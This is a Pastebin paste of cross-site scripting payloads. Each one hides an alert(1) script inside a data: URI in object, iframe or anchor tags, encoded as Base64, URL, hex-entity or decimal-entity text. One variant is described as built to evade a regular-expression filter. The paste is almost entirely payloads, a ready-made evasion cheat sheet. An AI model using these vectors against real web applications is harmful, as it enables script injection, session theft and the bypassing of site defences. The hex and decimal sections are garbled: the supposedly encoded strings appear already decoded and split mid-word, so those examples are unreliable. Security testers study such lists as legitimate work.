Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Base64 Encoded Vector:
- ---------------------
- <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== ></object>
- where the base64 encoded value: PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== is equal to
- <script>alert(1)</script>
- URL Encoded Vector:
- -------------------
- <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F
- %73%63%72%69%70%74%3E"></iframe>
- where %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E is equal to
- <script>alert(1)</script>
- Another variation of above vector where attacker only encoded angular brackets in order to evade
- the regular expression like:
- <iframe src="data:text/html,%3Cscript%3Ealert(1)%3C/script%3E"></iframe>
- Hex Entities Encoded Vector:
- ---------------------------
- <a href="data:text/html;blabla,<script>al
- ert(1)</script>">X</a>
- where <script>al
- ert(1)</script> is
- equal to <script>alert(1)</script>
- Decimal Entities Encoded Vector:
- -------------------------------
- <a href="data:text/html;blabla,<script>alert(
- 1)</script>">X</a>
- where <script>alert(
- 1)</script> is equal to <script>alert(1)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement